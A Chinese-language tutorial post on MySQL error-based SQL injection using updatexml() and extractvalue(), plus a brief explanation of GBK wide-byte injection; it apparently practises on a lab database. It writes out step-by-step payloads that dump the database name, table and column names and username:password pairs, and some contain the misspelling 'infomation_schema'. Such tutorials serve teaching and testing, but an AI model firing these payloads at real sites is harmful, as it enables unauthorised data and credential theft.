SQL报错注入

SQL注入报错注入

报错注入原理:报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的在遇到有报错回显的时候,但是没有数据回显的情况下可以利用报错注入的函数:

1.floor():向下取整

2.extractvalue(): 对XML文档进行查询的函数,当参数的格式不正确而

产生的错误,会返回参数的信息

3.updatexml(): 更新xml文档的函数,原理跟extracvalue一样

4.exp0:以e为底的指数函数

5.rand()+group()+count()

updatexml()

函数语法: updatexml(XML_document,XPath_string,new_value);

适用版本:5.1.5+

payload: updatexml(1,concat(0x7e,(select user()),0x7e),1)

前后添加~使其不符合xpath格式从而报错

复制代码
0x7e是~

extractvalue()

函数语法: EXTRACTVALUE(XML_document,XPath_string);

适用版本:5.1.5+

利用原理与updatexml函数相同

payload: and(extractvalue(1,concat(0x7e,(select user()),0x7e))

流程

1.利用爆破数据库名

and extractvalue(1,concat(0x7e,database(),0x7e)) --+

2.利用爆表名

and extractvalue(1,concat(0x7e,(select group_concat(table_name) from infomation_schema.tables where table_schema=database()),0x7e)) --+

3.利用爆列名

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users'),0x7e)) --+

但是可以发现没有全部显示列出来玩吗可以利用and column_name not in('id','login','password','email','secret')来显示其他的值,如果还是没有就全部显示出来就继续加到and 里面的值

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users' and column_name not in('id','login','password','email','secret')),0x7e)) --+

4.利用爆破值

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) --+

同样的没有显示全利用where username not in('Dumb','Angelina')

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in('Dumb','Angelina')),0x7e)) --+

SQL注入之宽字节注入

1.宽字节注入

原因:

1.现在大多数的网站对于SQL注入都做了一定的方法,例如使用一些Mysql中转义的函数addslashes,mysql_realescape_string,mysql_escape_string等,还有一种是配置magic_quote gpc,不过PHP高版本已经移除此功能。其实这些函数就是为了过滤用户输入的一些数据,对

特殊的字符加上反斜杠"\"进行转义。

2.网站开启了magic_quote gpc,或者使用了上面的转义函数数据库设置成gbk编码(不是html编码)

3.在编码中,gbk编码占用2个字符,ascll占用1个字符,攻击者恶意构造,把ascll字符吃掉,就能进行下一步攻击

相关推荐
伍六星35 分钟前
Flask和Django,你怎么选?
数据库·django·flask
杜哥无敌42 分钟前
ORACLE 修改端口号之后无法启动?
数据库·oracle
远方16091 小时前
0x-4-Oracle 23 ai-sqlcl 25.1.1 独立安装-配置和优化
数据库·ci/cd·oracle
远方16091 小时前
0x-3-Oracle 23 ai-sqlcl 25.1 集成安装-配置和优化
数据库·ide·ai·oracle
喵叔哟2 小时前
第1章:Neo4j简介与图数据库基础
数据库·oracle·neo4j
喵叔哟2 小时前
第6章:Neo4j数据导入与导出
数据库·oracle·neo4j
甜甜的资料库3 小时前
基于微信小程序的睡眠宝系统源码数据库文档
数据库·微信小程序·小程序
代码老y3 小时前
Redis:现代应用开发的高效内存数据存储利器
数据库·redis·缓存
远方16094 小时前
15-Oracle 23ai Vector Search Similarity Search-向量相似性和混合搜索-实操
数据库·ai·oracle
zz0723204 小时前
第二十周:Redis(二)
数据库·redis·缓存